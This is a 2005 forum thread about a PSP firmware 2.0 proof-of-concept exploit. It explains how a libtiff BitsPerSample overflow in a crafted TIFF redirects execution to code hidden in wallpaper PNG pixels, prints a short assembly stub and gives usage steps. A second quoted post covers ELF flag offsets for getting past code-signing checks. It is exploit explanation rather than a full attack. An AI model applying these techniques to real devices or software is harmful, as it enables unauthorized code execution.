2.0 Exploit(s) found!
Sep 23 2005, 03:11 PM
A small team has been working on finding an exploit for 2.0 based on the fact that Sony uses part of the "libtiff" code for its image viewer in 2.0, which has a known bug. Apparently they've managed to exploit this bug:
First Homebrew Code on 2.00
1. Set wallpaper to frame_buffer.png (without overflow.tif present
in the PHOTO directory, or it will crash).
2. Add overflow.tif to the PHOTO directory, and open into the photo
viewer. Custom code to paint the screen! Or to write a homebrew
app! Not to run illegal games.
How It Works?
1. The PNG contains a small amount of code in a known, fixed place
(the VRAM). If to look closely at the wallpaper, sees small
coloured pixels in the right down. The pixels are Allegrex
opcodes, with the highest byte all zero for the ALPHA. These
syscall 0x20C7 ; sceKernelDcacheWritebackI nvalidateAll
slt a0, zero, sp ; put 1 into a0
sll a0, a0, 6 ; put 64 into a0
addiu a0, sp, a0 ; get screen painter address over SP
jr a0 ; jump to the screen painter
nop ; branch delay slot
2. The TIFF contains also some code and a buffer to trigger the
known BitsPerSample overflow in libtiff in the photo viewer.
The buffer makes a jump to the VRAM which has the PNG colours
by overwriting the safed ra (return address) on the stack.
The VRAM code uses SP and calculates the address of the buffer
then runs it. Then it jumps there. The screen is yellow as
the colour was 0x12345678 in Hex.
I have tested this and it does something. Namely crashing my PSP after turning the screen yellow/brown, but obviously there is an exploit there which they've found.
If you have a 2.0 PSP and want to try it for yourself, you can download the file from our downloads section.
2.0 Exploit - Proof of concept
Source - PSP-Hacks
It appears Yoshihiro is still at work in the scene as he's found another possible exploit similar to the one initially required to get homebrew working on 1.5, Karloz25 found this for us:
Hi I am giving you some informations. Every psp flags can be found in the encrypted elf. What is a flag? A flag is used to allow or disallow a console to run code sur console.
I've run some tests modifying it but when I run my wifi minigame that comes from my original burnout game on the 1.50 PsP, I get a 0x80020148 error. and not a descrypting error such as 0xFFFFFFC3. It means my file isn't corrupt. I am running several more tests.
it starts at the offset : 0xC0
for the Wifi look for : 0000 0009
for the umd look for : 0000 0002
for the MS look for : 0000 000B
Edit : I found something else, when I remove the famous md5 at the end, I get the error: "the game could not be started 80020001" . on 1.52 it goves the same error than the a 1.50 psp when we try to run an eboot for 1.00 without kxploit on it. It's the same error code on 1.52 than the one that showed that 1.50 fw was hackable. I'll upload the files. Can someone test it on a 2.00 to know if there is the same error ? Thank you.
Source - Sony-X-Team
Your kidding, right?
unless your talking about something else
EDIT: I am stupid for not reading it carefully.
it is confirmed that the png method works by more then one site(some of which I can't post here for rules reasons).
However, it does not run hombrew yet. It is a proof of concept that allowed someone to insert a small piece of unsigned code on a protected psp2.0.
Not a rumor, people. May not amount to full blown homebrew, but is a helluva lot farther then has been gotten yet. You can download the files from psp-spot.com.
This news was posted some time ago in the front page news as well as a continuing discussion which can be found here: